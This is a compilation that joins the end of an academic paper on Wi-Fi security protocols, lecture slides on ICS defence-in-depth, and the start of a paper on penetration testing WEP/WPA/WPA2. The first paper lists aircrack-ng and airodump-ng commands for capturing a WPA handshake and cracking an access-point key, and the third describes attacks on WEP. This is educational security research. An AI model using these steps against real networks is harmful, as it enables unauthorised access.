can manage four shared secret keys. A per-packet integer called the initialization vector is
transmitted unencrypted over the air. Since it is one of the inputs to the RC4 method, it
works best if it is produced randomly. IEEE 802.11 does not mention the IV generation. In
actuality, many cards produce IVs in a linear manner, that is, 1, 2, 3, etc. A key stream K
with a length equal to the message that will be delivered by the data-link layer is created
using the RC4 method. The IV and k are its inputs. Initialization Vectors are reused
with encrypted packets, the algorithm used to encrypt a WEP ’hash’ is not intended for
encryption purposes, and the most critical vulnerability is the widespread use of the WEP
key. These are only a few of WEP’s many weaknesses Butt et al. (2019).
4.1 Security Schemes in WLANs

Wi-Fi Protected Access (WPA), Wired Equivalent Privacy (WEP), Wi-Fi Protected Access 2
(WPA2), and Wi-Fi Protected Access 3 (WPA3) are the last and most reliable security methods
for WLAN technology. These four security schemes have been implemented for IEEE 802.11
standards. WPA2 security scheme presents a notable improvement compared to WPA and
WEP due to using counter mode cipher block chaining message authentication code protocol
(CCMP) based on advanced encryption standard (AES) block cipher instead of Rivest cipher 4
(RC4) stream cipher. However, WPA2 uses a pre-shared key (PSK), if an adversary gets access
to the shared key. Then, he or she exploits the key to implement an attack (by decrypting
the traffic). WPA3 solves this problem using the Simultaneous Authentication of Equal (SAE)
handshaking (secure key establishment protocol) which is called Dragonfly handshaking. SAE
deals with password based-authentication rather than the PSK technique. Moreover, WPA3
exploits the latest security methods and it employs mandatory protected management frames
(PMF) mechanisms to secure the management frames.
In the case of WPA3, it is likely difficult for an adversary to steal the wireless traffic of the
clients who are protected by WPA3. Even if an attacker has successfully guessed a client’s pass-
word, he cannot get the session keys used for encryption and decryption. It is worth mentioning
that, this thesis concentrates on the WPA3 security scheme because this scheme compensates
for the issues that were introduced in the previous security schemes in WLANs.
211
4.2 Ciphering Module of WPA3

WPA3 is a subset and the latest improvement of the 802.11i security standard of WLAN technol-
ogy for personal and enterprise networks. WPA3 enhances the encryption of wireless networks
using a new encryption protocol called Galois Counter Mode Protocol (GCMP) with Advanced
Encryption Standard (AES) Ahmad et al. (2018). In addition, WPA3 improves the authentica-
tion of wireless networks by dealing with Simultaneous Authentication of Equal (SAE is defined
as a secure key establishment protocol) with a length key equal to 128 or 192 bits to submit
stronger defences against password guessing where WPA2 was dealt with pre-shared key (PSK).
Further, WPA3 deals with GCMP and the secure hash algorithm (HMAC-SHA 384) Lamers
et al. (2021). Therefore, WPA3 offers encryption (Elliptical Curve Cryptography with 192-bit
security suite), authentication (SAE), and data integrity (Secure hash algorithm: SHA-1 or
SHA-2).
WPA3 supports multi-operation modes where the best mode that addresses the design of
the substation network is a WPA3 enterprise mode because this mode is specialized to the in-
dustry environment and it enforces robust secret security standards compared to other secret
security standards Wang et al. (2020), Baray and Ojha (2021). Opportunistic Wireless En-
cryption (OWE), when used in enterprise mode, encrypts wireless client interactions with AP
conversations using a different key for each connection. Every wireless connection has unique
encryption. It employs a Protected Management Frame (PMF) mandatory to support the pro-
tection of management frames between APs and wireless clients.
4.3 Wireless Network Security Threats

Wireless networks due to their broadcast nature the risk of interception is greater than with
wired networks. Here are some of the major threats to a wireless network Kamrul et al. (2022):
1. Sniffing to Eavesdrop: due to the wireless communication broadcast nature over radio
waves, eavesdroppers can easily pick up unencrypted messages, which means reaching for
sensitive network information.
2. Denial of service attacks (DoS): in this type, network attackers flood the network with
a lot of the number of requests so that the network could not handle all these requests
which leads to a network crash.
3. Rogue Access Points: It is a technique for building an unsecure access point inside the
firewall in order to open a back door into the trusted network.
4. Network Abuses: Authorized users are also able to compromise the security of the
network by abusing it by using bandwidth, slowing down connections, and obstructing a
WLAN’s overall performance.
5. Brute-Force Attack:This type of attack uses the method ”Trial and error” by guessing
passwords. An attacker first gathers the fundamental information about the user. For
example, user’s full name, room number, vehicle number, children names etc. The attacker
continuously tries random passwords on the basis of the user’s personal information. The
attacker tries this until he/she gets success. This may take hours, days, months and years
also.
5 Practical Work
In this work, ethical hacking is intended to understand the security bugs of IEEE 802.11.
212
5.1 Under Windows

Types of equipment used are Wlan Adapter (3com with Atheros chipsets), Personal Computer
(P4), Laptop (p4), and Access Point (D-Link, Micronet, Cisco). Wireless scanning programs like
Netstumbler, Aire1.0 and CommView are also needed for scanning and hacking WIFI signals.
Netstumbler is used for finding AP information like the MAC Address of AP, SSID, the channel
of WLAN, and the SNR of WLAN as shown in Figure 1. Here we mention that if disabling
SSID Broadcast choice is taped in Cisco AP settings, the netstumbler program could not find
the AP signal. So we used the Commview program to find the WIFI signal.
Figure 1: Output of NetStumbelr
Commview give more options than Netstumblerlike capture packet, statistics view of how
station and AP connect with each other, packet transferred, and other options as shown in
Figures 2 and 3.
Figure 2: CommView for WiFi
Atheros Driver is used to make the WLAN adapter enter Monitor Mode under Windows.
Figure 4 shows the installation of the Atheros driver. With D-Link (DWL-2000AP) we made a
simple network to try to access it. Then by using AiroWizard 1.0 with the options Aircracki-
ng and Airodumbi-ng enough data (more than 10000IVs) will be collected, after that with the
Aircrack option AP key should be found. The AP key will be in ASCII code. Figure 5 shows a
capture of the AiroWizard 1.0 program with AP key found.
213
Figure 3: Statistics view of how station and AP connect with each other
Figure 4: Wireless network adapter installation
5.2 Under Linux

Linux (backtrack v2) is used for getting the AP key, which is a live CD mean that starts
automatically without installing only boot from it. This version provides a wide spectrum of
the hacking program already installed in it. Cracking WPA is different than WEP crack it
does not depend on collecting packets but instead depends on Handshaking signal. You can
either actively or passively achieve this. ”Actively” means the de-authenticating process will
be accelerated such that there is an existing wireless client. ”Passively” Passively refers to the
214
Figure 5: AiroWizard Capture with AP Key founded
act of patiently awaiting a wireless client’s WPA network authentication. To enter the WLAN
adapter in Monitor mode below commands are used
# Wlanconfig ath0 create wlandev wifi0 wlanmode monitor
# ifconfig aht0 up
For finding wireless APs the following command is used
# iwlist ath0 scan
Figure 6 shows the results of the scanning for WLAN networks
Figure 6: Scanning for WLAN Networks
Then for Starting airodump-ng to collect authentication handshake, we used the command
# airodump-ng -c 2 –bssid 00:11:95:3C:2A:36 -w work ath0
215
The purpose of this step is to capture the 4-way authentication handshake for the AP we
are interested in. Now to find the AP key we used the command
# aircrack-ng -w 1.lst work-01.cap
Figure 7 shows the capture of backtrack V2 after finding the AP key
Figure 7: Capture of Back Track V2 after Finding the AP Key
6 Recommendations and Conclusions Remarks

Although some wireless protocols have major security issues, some methods may be performed
to secure the wireless networks, which are listed below:
1. Enable WPA encryption instead of WEP: Weaknesses in the 802.11 WEP (Wired
Equivalency Privacy) encryption make it very simple for a determined user with the correct
tools to break the encryption and access the wireless network. WPA (Wi-Fi Protected
Access) is a superior method of WLAN security. Since WPA doesn’t restrict your password
characters to 0-9 and A-F like WEP does, it offers far better security and is simpler to
use. A more recent version, WPA3, is found in newer hardware and provides even stronger
encryption.
2. Using a strong encryption protocol: Using a recent encryption protocol such as

WPA 3 is recommended because employing the old protocol such as WEP and WPA 1 is
vulnerable to attacks as was demonstrated in the practical part of this work.
3. Change the Administrator Password: Devices which serve as wireless access points
often come with a default password. Many manufacturers’ default passwords are well
known and can be utilized to log into a network without permission. Therefore, change
216
the administrator password to be at least 8 characters with special symbols (such as #, $,

and &). Also, avoid using personal information such as the birth date.
4. Keep the Access Point Software Up to Date: The maker of the wireless access
point sometimes offers software updates for the device to fix faults. It is highly advised to
frequently check the manufacturer’s website for any software updates for the device.
5. Reduce RF power transmission to the minimal level necessary: A common mea-

sure used to prevent an attack is turning the power down on the AP (if an internal WLAN
network is used). By turning the power down, the range of the AP signal is reduced and
hence reduces the probability of an outsider attack.
6. Use directional antennas: The propagation of RF signals can be difficult to control

and frequently isn’t practicable. Usually, the RF energy will spread outside the stations’
operating range. Using directional antennas on the access points is an additional security
measure in addition to power-limiting transmission levels. The majority of access points
ship standard with omnidirectional antennas, which spherically emit the RF signal with
equal power in all directions. To stop RF signals from spreading, directional antennas can
direct the energy in that direction.
7. MAC filtering: When this low-level security control is implemented on the access point,
only stations with specific MAC addresses will be able to connect with the access point.
By doing so, unauthorized access will be reduced.
8. Changing the encryption keys regularly: In order to prevent a compromised network

from continuing to be compromised indefinitely, encryption keys should be changed. Even
while there’s always a chance that a hacker may be able to crack the encryption key a
second time, changing keys gives them a little less incentive.
9. Disable Beacon Packets: Some APs have a setting that prohibits the AP from period-
ically broadcasting beacon packets to announce its presence. Before responding to traffic,
these APs demand that wireless network cards utilize the same SSID. This feature stops
some WLAN scanning programs from being used by hackers.
References
Ahmad, N., Wei, L. M., and Jabbar, M. H. (2018). Advanced encryption standard with galois
counter mode using field programmable gate array. In Journal of Physics: Conference Series,
volume 1019, page 012008. IOP Publishing.
Alabady, S. A. (2008). Design and implementation of a network security model using static vlan
and aaa server. In 3rd IEEE International Conference on Information and Communication
Technologies: From Theory to Applications, 2008. ICTTA 2008., pages 1–6.
Alabady, S. A. (2009). Design and implementation of a network security model for cooperative
network. International Arab Journal of e-Technology, 1(2):26–36.
Alabady, S. A., Al-Turjman, F., and Din, S. (2020). A novel security model for cooperative
virtual networks in the iot era. International Journal of Parallel Programming, 48(2):280–
295.
Alabady, S. A. and Salleh, M. (2013). Overview of wireless mesh networks. Journal of Commu-
nications, 8(9):134–144.
217
Anitha, G., Nirmala, P., Ramesh, S., Tamilselvi, M., and Ramkumar, G. (2022). A novel data
communication with security enhancement using threat management scheme over wireless mo-
bile networks. In IEEE International Conference on Advances in Computing, Communication
and Applied Informatics (ACCAI), pages 1–6.
Badholia, A., Verma, V., and Kashyap, S. K. (2019). Wep, wap and wap2 wireless network
security protocol: A compact algorithm:(wireless network security protocol). In IEEE In-
ternational Conference on Computing, Communication, and Intelligent Systems (ICCCIS),
pages 239–243.
Baray, E. and Ojha, N. K. (2021). Wlan security protocols and wpa3 security approach mea-
surement through aircrack-ng technique. In 5th IEEE International Conference on Computing
Methodologies and Communication (ICCMC), pages 23–30.
Bendale, S. P. and Prasad, J. R. (2018). Security threats and challenges in future mobile wireless
networks. In IEEE Global Conference on Wireless Computing and Networking (GCWCN),
pages 146–150.
Butt, S. A., Diaz-Martinez, J. L., Jamal, T., Ali, A., De-La-Hoz-Franco, E., and Shoaib, M.
(2019). Iot smart health security threats. In 19th IEEE International conference on compu-
tational science and its applications (ICCSA), pages 26–31.
Chen, J., Yang, T., He, B., and He, L. (2021). An analysis and research on wireless network
security dataset. In IEEE International Conference on Big Data Analysis and Computer
Science (BDACS), pages 80–83.
Faika, T., Kim, T., Ochoa, J., Khan, M., Park, S.-W., and Leung, C. S. (2019). A blockchain-
based internet of things (iot) network for security-enhanced wireless battery management
systems. In IEEE industry applications society annual meeting, pages 1–6.
Gupta, A. and Jha, R. K. (2015). Security threats of wireless networks: A survey. In IEEE
International Conference on Computing, Communication and Automation, pages 389–395.
He, D., Li, X., Chan, S., Gao, J., and Guizani, M. (2019). Security analysis of a space-based
wireless network. IEEE Network, 33(1):36–43.
Hoseini, S. A., Bouhafs, F., and den Hartog, F. (2022). A practical implementation of physical
layer security in wireless networks. In IEEE 19th Annual Consumer Communications and
Networking Conference (CCNC), pages 1–4.
Jilani, S. A., Koner, C., and Nandi, S. (2020). Security in wireless sensor networks: attacks
and evasion. In IEEE National conference on emerging trends on sustainable technology and
engineering applications (NCETSTEA), pages 1–5.
Kamrul, H. M., Ghazal, T. M., Saeed, R. A., Pandey, B., Gohel, H., Eshmawi, A., Abdel-Khalek,
S., and Alkhassawneh, H. M. (2022). A review on security threats, vulnerabilities, and counter
measures of 5g enabled internet-of-medical-things. IET Communications, 16(5):421–432.
Kaur, R. and Sandhu, J. K. (2021). A study on security attacks in wireless sensor network.
In IEEE International conference on advance computing and innovative technologies in engi-
neering (ICACITE), pages 850–855.
Lamers, E., Dijksman, R., van der Vegt, A., Sarode, M., and de Laat, C. (2021). Securing home
wi-fi with wpa3 personal. In IEEE 18th Annual Consumer Communications and Networking
Conference (CCNC), pages 1–8.
218
Lin, Y. and Chang, J. (2019). Improving wireless network security based on radio fingerprint-
ing. In IEEE 19th International Conference on Software Quality, Reliability and Security
Companion (QRS-C), pages 375–379.
Liu, Y. (2022). Security in wireless networks: Analysis of wi-fi security and attack cases study. In
IEEE International Conference on Artificial Intelligence in Everything (AIE), pages 476–481.
Maesaroh, S., Kusumaningrum, L., Sintawana, N., Lazirkha, D. P., and Dinda, R. (2022).
Wireless network security design and analysis using wireless intrusion detection system. In-
ternational Journal of Cyber and IT Service Management, 2(1):30–39.
Mao, Q., Hu, F., and Hao, Q. (2018). Deep learning for intelligent wireless networks: A com-
prehensive survey. IEEE Communications Surveys and Tutorials, 20(4):2595–2621.
Michael, S. (2002). Hacking the invisible network insecurities in 802.11 x. iAlert White paper,
pages 1–35.
Nazir, R., Laghari, A. A., Kumar, K., David, S., and Ali, M. (2021). Survey on wireless network
security. Archives of Computational Methods in Engineering, pages 1–20.
Pamarthi, S. and Narmadha, R. (2022). Literature review on network security in wireless mobile
ad-hoc network for iot applications: Network attacks and detection mechanisms. International
Journal of Intelligent Unmanned Systems, 10(4):482–506.
Patil, B., Kharade, K., and Kamat, R. (2020). Investigation on data security threats and
solutions. International Journal of Innovative Science and Research Technology, 5(1):79–83.
Wang, L., Yang, J., and Wan, P.-J. (2020). Educational modules and research surveys on critical
cybersecurity topics. International Journal of Distributed Sensor Networks, 16(9):1–18.
Wu, H. and Wu, H. (2021). Research on computer network information security problems and
prevention based on wireless sensor network. In IEEE Asia-Pacific Conference on Image
Processing, Electronics and Computers (IPEC), pages 1015–1018.
Zaman, S., Alhazmi, K., Aseeri, M. A., Ahmed, M. R., Khan, R. T., Kaiser, M. S., and Mahmud,
M. (2021). Security threats and artificial intelligence based countermeasures for internet of
things networks: a comprehensive survey. IEEE Access, 9:94668–94690.
219
UFCF7P-15-M CRITICAL
SYSTEMS SECURITY
Defence-in-depth
1
RECAP
2
• Kill chain model – the basis of intelligence-driven computer network

defence
• Kill chain analysis illustrates that the adversary must progress

successfully through each stage of the chain before it can achieve
its desired objective; just one mitigation disrupts the chain and the
adversary [1].
• Objectives:
– Identify phases of intrusion.
– Map adversary kill chain indicators to defender courses of action.
– Identify patterns that link individual intrusions into broader campaigns.
– Understand the iterative nature of intelligence.
3

• The fundamental element of intelligence in the Cyber Kill Chain model
is the indicator; any piece of information that objectively describes
an intrusion.

– Atomic
– Computed
– Behavioural
4
Atomic indicators
• Atomic indicators are those which cannot be broken down into
smaller parts and retain their meaning in the context of an intrusion.
• Typical examples here are IP addresses, email addresses and
vulnerability identifiers.
[email protected]
8.1 .5
192.16 CVE-1999-0067
5
Computed indicators
• Computed indicators are those which are derived from data involved
in an incident.

expressions.
6
• Behavioural indicators are collections of computed and atomic
indicators, often subject to qualification by quantity and possibly
combinatorial logic.
•Example:
•“the intruder would initially use a backdoor which generated network

traffic matching [regular expression] at the rate of [some frequency]
to [some IP address], and then replace it with one matching the [MD5
hash value] once access was established”
7
8
9
This week
• ICS Security Architecture

• Network segmentation
• Boundary protection
• Firewalls
• Network segregation
• Defence-in-depth
• ISA/IEC 62443-3-2
• In the tutorial
10
ICS Security Architecture
• Separate corporate network from ICS network
• If the networks must be connected, only minimal (single if possible)

connections be allowed and that the connection is through a firewall
and a DMZ.
11
• Operational risk analysis should be performed to determine critical

parts of the ICS network and define segmentation (partitioning the
network into smaller networks).
• Segmentation establishes security domains typically defined as

being managed by the same authority, enforcing the same policy,
and having a uniform level of trust.
• Goal: Minimise access to sensitive information, ICS communication

and equipment configuration.
12

• Traditionally, network segmentation and segregation is implemented at
the gateway between domains.
corporate LANs
control LANs
Internet
operational LANs
operational DMZs
13

Common technologies and methods:
• Logical network separation enforced by encryption or network

device-enforced partitioning (VLANs, VPNs, unidirectional gateways)
• Physical network separation to completely prevent any

interconnectivity of traffic between domains.
• Network traffic filtering use a variety of technologies at various

network layers to enforce security requirements and domains (e.g.
filtering based on IP, port and/or protocol or at the application layer).
14
Defence in depth
• Deploy multiple layers of protection
• Redundancy in case a security measure fails
• Make the attacker’s life difficult!
15
Network segmentation and segregation - Defence in

depth
Four common themes that implement the concept of defense-in-depth

by providing for good network segmentation and segregation:
1) Apply technologies at more than just the network layer.
2) Use the principles of least privilege and need‐to‐know.
3) Separate information and infrastructure based on security

requirements.
4) Implement whitelisting instead of blacklisting.
16

network segments)
Control the flow of information between interconnected security

domains.
Boundary protection controls include: gateways, routers, firewalls,

DMZs, network-based malicious code analysis and virtualisation
systems, intrusion detection systems (network and host-based),
encrypted tunnels, managed interfaces, mail gateways, and
unidirectional gateways (e.g. data diodes).
Boundary protection devices determine whether data transfer is

permitted, often by examining the data or associated metadata.
17

network segments)
• Common architectural construct is the DMZs; a host or network

segment inserted as a “neutral zone” between security domains.
• Denying communications traffic by default and allowing

communications traffic by exception (white-listing policy)
• Limit direct connectivity by implementing proxy servers that act as an

intermediary for external domains’ requesting information system
resources (e.g., files, connections, or services) from the ICS domain.
• Deep packet inspection firewalls and XML gateways.
18

network segments)
• Allow communication only between authorised and authenticated

source and destinations address pairs
• Extending the DMZ concept to other separate subnetworks is useful,

for instance isolating ICS to prevent adversaries from discovering
the analysis and forensics techniques of organisations.
• Enforce physical access control to limit authorised access to ICS

components
• Conceal network addresses of ICS components from discovery

(e.g., network address not published or entered in domain name
systems), requiring prior knowledge for access.
19

network segments)
• Disable control and troubleshooting services and protocols,

especially those employing broadcast messaging, which can facilitate
network exploration.
• Disable feedback (e.g., non-verbose mode) to senders when there is

a failure in protocol validation format to prevent adversaries from
obtaining information.
• Implement one-way data flow, especially between different security

domains.
• Establishing passive monitoring of ICS networks to actively detect

anomalous communications and provide alerts.
20

network segments)
Network and ICS security architects must decide:
• which domains are to be permitted direct communication,

• the policies governing permitted communication,
• the devices to be used to enforce the policy, and
• the topology for provisioning and implementing these decisions,
which are typically based on the trust relationship between domains.
21
Firewalls

the more sensitive areas.
Types of Firewalls:
22
Firewalls

Types of Firewalls:
23
Firewalls

Types of Firewalls:
24
Firewalls

Types of Firewalls:
25
Network segregation
26
Network segregation
Dual-Homed Computer/Dual Network Interface Cards (NIC)
• No systems other than firewalls should be configured as dual-

homed to span both the control and corporate networks
• All connections between the control network and the corporate

network should be through a firewall.
27
Defence-in-depth
• Multiple layer strategy involving two (or more) different overlapping

security mechanisms
• A defense-in-depth architecture strategy includes the use of firewalls,

the creation of demilitarised zones, intrusion detection capabilities
along with effective security policies, training programs, incident
response mechanisms and physical security.
• Also requires thorough understanding of possible attack vectors on an

ICS.
28
Defence-in-depth
29
ISA/IEC 62443
• ISA and IEC have developed the IEC 62443 series of standards to
address the need to design cybersecurity robustness and resilience
into industrial automation control systems (IACS)
• Provides the detailed information to implement a cyber-security

program.
• https://www.isa.org/training-and-certifications/isa-certification/
isa99iec-62443/isa99iec-62443-cybersecurity-certificate-programs/?
utm_medium=social&utm_campaign=smm-training-ISA-IEC-62443-
Cybersecurity-Certificate-Programs&utm_source=twitter
30
ISA/IEC 62443
31
ISA/IEC 62443-3-2: Security Risk Assessment and

System Design
• Includes the zone and conduit requirements (network segmentation

and aggregation)
• You can find it in the reading list. alternatively you can download it
from UWE’s Library online webpage.
32
In the tutorial…
• NIST 800-82, Section 5.2 Boundary Protection

• Sans 401 Network Model
• Design defence-in-depth for an ICS.

• Attack Vectors,
• Attack Trees,
• Kill Chain
33
References
Chapter 5 from: https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/

final
IEC/ISA 62443-3-2
34
See discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/342283555
Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux

Hacking Tools
Article in International Journal of Computer Applications · June 2020

DOI: 10.5120/ijca2020920365
CITATIONS READS
18 8,203
2 authors:
Michael Kyei Kissi Michael Asante

University of Media, Arts and Communication (UniMAC) Kwame Nkrumah University Of Science and Technology
2 PUBLICATIONS 18 CITATIONS 77 PUBLICATIONS 203 CITATIONS
SEE PROFILE SEE PROFILE
All content following this page was uploaded by Michael Kyei Kissi on 10 July 2020.
The user has requested enhancement of the downloaded file.

Penetration Testing of IEEE 802.11 Encryption Protocols

using Kali Linux Hacking Tools
Michael Kyei Kissi Michael Asante, PhD

Department of Computer Science Department of Computer Science
Kwame Nkrumah University of Science and Kwame Nkrumah University of Science and
Technology Technology
Kumasi, Ghana Kumasi, Ghana
ABSTRACT standards. The 802 handles the Local and Metropolitan Area
The use of wireless network as a medium of communication Network (MAN) whilst the suffix .11 handles the WLAN [3].
has tremendously increased due to its flexibility, mobility and The 802.11 is governed by set of rules or protocols to aid
easy accessibility. Its usage is inevitable at hotels and propagation of wireless signals and communication across the
restaurants, airports, organizations and currently predominant wireless network. The 802.11 employs the Carrier Sense
in homes. As large number of devices connect to wireless Multiple Access (CSMA) and the Medium Access Control
network, valuable and sensitive information are shared among (MAC) protocol with Collision Avoidance (CA). There are
users in the open air, attackers can easily sniff and capture versions of the standard which can be recognized by one or
data packets. This paper aims at using penetration testing to two ending alphabetic characters, these are 802.11a, 802.11b,
assess vulnerabilities and conduct attacks on Wireless 802.11g, 802.11n and 802.11ac [8]. The most common and
Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) widely used among the standard are the 802.11a, 802.11b and
and 802.11i (WPA2) security protocols. The penetration 802.11g [7].
testing was conducted using Kali Linux with its Aircrack-ng
tools.
2.1 Attacks on WLAN
WLAN uses Radio Frequency (RF) or Infrared Transmission
Keywords Technology for connectivity among devices making it
IEEE, 802.11, WEP, WPA, WPA2, Kali Linux, Aircrack-ng, susceptible to attacks. Attacks on wireless network aims at
WLAN, Wireless, Penetration Testing, Encryption, Security. breaching the integrity and confidentiality of the network
availability and needed information. These attacks are
1. INTRODUCTION categorized into Passive and Active Attacks.
Wireless Network in today’s communication technology is Passive attack: Network traffics are silently eavesdropped or
tremendously increasing due to the benefits it provides such monitored by an attacker and waits until a client seeks to
as flexibility, mobility and easier accessibility. Most hotels connect with the Access Point (AP) or searches for the
and restaurants, coffee shops, airports, organizations and network Service Set Identifier (SSID) as a result the attacker
institutions currently provide open or secured wireless obtains the SSID in plaintext. An attacker can intercept data
connectivity. Nevertheless, wireless network can also be seen transmitted through the network such as Traffic Analysis,
in homes [1]. The IEEE 802.11 Wireless Local Area Network Packet Sniffing, War-Driving and Port Scanning. These types
(WLAN) has evolved to be the easiest and known network of attacks are usually difficult to detect since the attacker does
technology to setup since its inception. Its popularity is as not modify the content or information [9].
result of the use of a Local Area Network (LAN), less
expensive, easy setup installation and configuration Active attack: The attacker does not only gain access to
procedures [2]. The availability of WLAN menaces the information but can make changes to the network information
security of the Network Infrastructure causing challenges for and even inject fraudulent packets to the network. An attacker
Network Administrators as well as the organization. WLAN can initiate commands to disrupt the usual operations of the
signal travels beyond the boundaries of a specified area as network such as Denial of Service (DoS), Session Hijacking,
compared to wired network [3]. [4] noted that the use of the Brute force Attack, Reply Attack, and Man in the Middle
wireless medium is shared among its users in the open air; (MITM) attack [9] [10].
attackers can easily sniff and capture data packets. WLAN
may suffer attacks and damages such as system comprised, 2.2 WLAN Security
data theft, Denial of Service (DoS) and among others [5]. This The WLAN protocols outlined by the IEEE comprise of three
study presents a security assessment of WLAN using security standards, these are Wired Equivalent Privacy
penetration testing tools to examine and exploit identified (WEP), Wi-Fi Protected Access (WPA) and Wi-Fi Protected
vulnerabilities in WLAN security protocols. Penetration Access 2 (WPA2) [11]. [12] stated that WLAN security
testing framework used for the testing was based on the protocols were designed to protect the network from several
National Institute of Standards and Technology (NIST) [6]. breaches due to susceptibility of the Wi-Fi transmission
The framework involves four phases namely; Planning Phase, signals which has no limited boundaries, hence, they are
Discovery Phase, Attack Phase and Reporting Phase. prone to illegitimate access. According to [13] a secured
WLAN must have five key requirements, namely;
2. LITERATURE REVIEW Authentication, Access Control, Confidentiality, Non-
The IEEE 802.11 gives a criterion for WLAN Repudiation and Data Integrity. In spite of this WLAN
communications among devices [7]. The IEEE in 1997 security are prone to threats such as Eavesdropping and traffic
developed the 802.11 standard which is a subset of the 802 analysis, Denial of Service, Masquerade, forged packets and
26
among others. 2.3.1.3 No Mutual Authentication

WEP authentication is client-centered or one-way
2.3 Wired Equivalent Privacy (WEP) authentication. The client cannot prove its identity to the AP,
The IEEE 802.11 developed WEP in 1999 to endow security only the AP authenticates the client since the WEP Key is
for wireless network as compared to the wired [3]. The WEP configured on the AP [19].
encryption is based on RC4 symmetric stream cipher with 40-
bit and 104-bit encryption keys [7]. WEP involves two
parameters, an Initialization Vector (IV) which is a three (3)
2.3.1.4 Forged Authentication Messages
An attacker eavesdrops and monitors packets transmitted in
byte value and shared WEP Key of hexadecimal digits for
order to uncover the RC4 stream cipher used for encryption
encryption and decryption. WEP appends a 32-bit Cyclic
[20]. The stream obtained is used to encrypt any challenge
Redundancy Check (CRC) checksum to each transmitted data
received since an attacker can forge a valid authentication
frame. The 24-bit IV which is randomly selected together with
packet out of the keystream.
the secret key sent to the RC4 to produce a keystream. The
plaintext is XORed with the RC4 keystream to create a cipher 2.3.2 Attacks on WEP
text as illustrated in figure 1.
2.3.2.1 Chopchop Attack
The Chopchop attack decrypts the entire WEP packet without
knowing the WEP Key. An attacker decrypts the last n bytes
of plaintext of encrypted packet by sending an average of
n*128 packets on the network [21]. The Chopchop attack
exploit the vulnerability of the 4-byte checksum used for the
integrity of the encrypted packets [22].
2.3.2.2 Fluhrer, Mantin and Shamir (FMS) Attack

Figure 1: WEP Data Frame Encryption [14] The FMS attack is a statistical attack discovered by Fluhrer,
[15], WEP decrypts received data frames by regenerating the Mantin and Shamir. The attack is as a result of the use of
keystream using the RC4 (IV and shared key) and then weak Initialization vectors (IV’s) in RC4 algorithm [23]. [24]
XORed with the cipher text to retrieve the plaintext. A new describes the “weak” IVs of having a structure of B+3::ff:X
checksum is computed and compared with the received (where B is the byte of key, ff being constant value of 255,
checksum. The plaintext is obtained if the two checksums are and X is irrelevant). The attacker can determine the value of B
equal as shown in figure 2. by using the information of the plaintext found in the headers
of certain packets, like the Address Resolution Protocols
(ARPs) [25].
2.3.2.3 ARP Replay Attack

IVs are freely reused and has no sequence number to validate
replayed packets, this gives room for an attacker to generate
more packets from the captured packets [26]. ARP Request
packets are easily identified based on the destination MAC
Figure 2: WEP Data Frame Decryption [14] address and fixed size. The attacker sniffs ARP Request
packets from a legitimate host and keeps replaying that ARP
2.3.1 Weakness and Vulnerabilities in WEP Request and the host response with ARP Reponses and
WEP uses RC4 algorithm and secret key to provide access therefore more traffic is generated. When enough data packets
control and confidentiality, and the CRC checksum for data with weak IVs are collected, the WEP Key is easily cracked
integrity [15]. With these security control mechanisms, WEP within a short period.
security protocol has vulnerabilities and can be exploited by
attackers. 2.4 Wi-Fi Protected Access (WPA)
Wi-Fi Alliance created WPA in 2003 to improve the existence
2.3.1.1 Short IV Size and Keystream Reuse of vulnerabilities and flaws in WEP [20]. WPA improves data
The IV has a size of 24 bits processing 16,777, 216 different encryption using a hashing algorithm called Temporal Key
RC4 cipher streams for a given WEP key and transmitted in Integrity Protocol (TKIP) which scramble the keys and adds
clear text for each packet [16]. IV is used to alter the an integrity check feature to prevent tampering of the
keystream, when the IV value changes so do the keystream. encrypted keys [20]. TKIP uses the RC4 encryption algorithm
When more traffics are sent, unique IVs cannot be generated same as WEP but uses hash value to determine the uniquely
after transmitting 224 packets, hence, there is a possibility of generated temporal key for each packet traversed. TKIP make
IVs repeating (reuse) because the 24-bits space will be use of Message Integrity Code (MIC) for integrity check
exhausted. instead of the ICV used with WEP. This prevents attackers
from injecting data into a packet to find the keystream used to
2.3.1.2 Integrity Check Value (ICV) Insecurity encrypt the data [27]. It also uses sequence counters to
The availability of the ICV or CRC checksum is to safeguard prevent replay attacks which improves integrity check.
packets in transit, preventing attackers from altering the
packets [17]. The CRC is a linear function which means an 2.5 Wi-Fi Protected Access 2 (WPA 2)
attacker can modify encrypted messages and fix the ICV to Wi-Fi Alliance improved WPA in 2004 by designing the
obtain a genuine message. An attacker with a valid keystream 802.11i (WPA2) which uses the concept of Robust Security
can create arbitrary messages, compute the checksum and Network (RSN) [20] [10]. It tackles three key security areas
encrypt it using the keystream since WEP allows IV reuse namely; Data Transfer Privacy, Authentication and Key
[18]. Management [28]. WPA2 uses Advanced Encryption
Standard (AES) called Counter Mode Cipher Block Chaining
27
- Message Authentication Code (CBC-MAC) protocol 3. Authenticator to Supplicant

(CCMP) for data encryption [29] [30]. CCMP was created as The PMK is used to decrypt it and acquires the SNonce and
part of the 802.11 security for the 802.11i (WPA2) to replace MIC when the AP receives the second message. The AP uses
WEP and TKIP [10]. The AES uses the Rijindael algorithm the received MIC to check for data integrity. The AP also
consisting of a block cipher using 128-bit, 192-bit or 256-bit derives its PTK using the same inputs and installs if the MIC
key. AES permits the use of a single encryption key to all value is valid.
packets, which removes the challenges associated with key
scheduling and key distribution related to WEP and TKIP 4. Supplicant to Authenticator
protocols [31]. Both supplicant and AP check whether the PTKs are equal by
decrypting the third message. The supplicant installs the PTK
2.5.1 WPA/WPA2-PSK Four-Way Handshake for encrypted unicast transmission and Group Transient Key
WPA/WPA2 uses dynamic keys generated from per-packet to (GTK) for broad or multicast transmission.
generate the Pairwise Master Key (PMK). According to [32],
the four-way handshake provides mutual authentication based
on the PMK, and agrees on a fresh session key known as the
Pairwise Transient Key (PTK). The four-way handshake
contains four packets (messages) exchange that occurs
between the client (Supplicant) and the AP (Authenticator).
The PMK is generated by using the hashing algorithm
PBKDF2 which requires inputs:
PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)
Where:
Passphrase: The passphrase (8 to 63 characters)
SSID: the SSID of the Authenticator (AP)
Figure 3: Generation of WPA/WPA2 Four-way
SSIDlen: the length of the SSID
Handshake [33]
4096: Number of hashing iterations (through SHA1
algorithm) 2.5.2 Weakness and Vulnerabilities in
WPA/WPA2
256: Intended Key Length of the PSK All values needed to compute the PTK from the PMK are
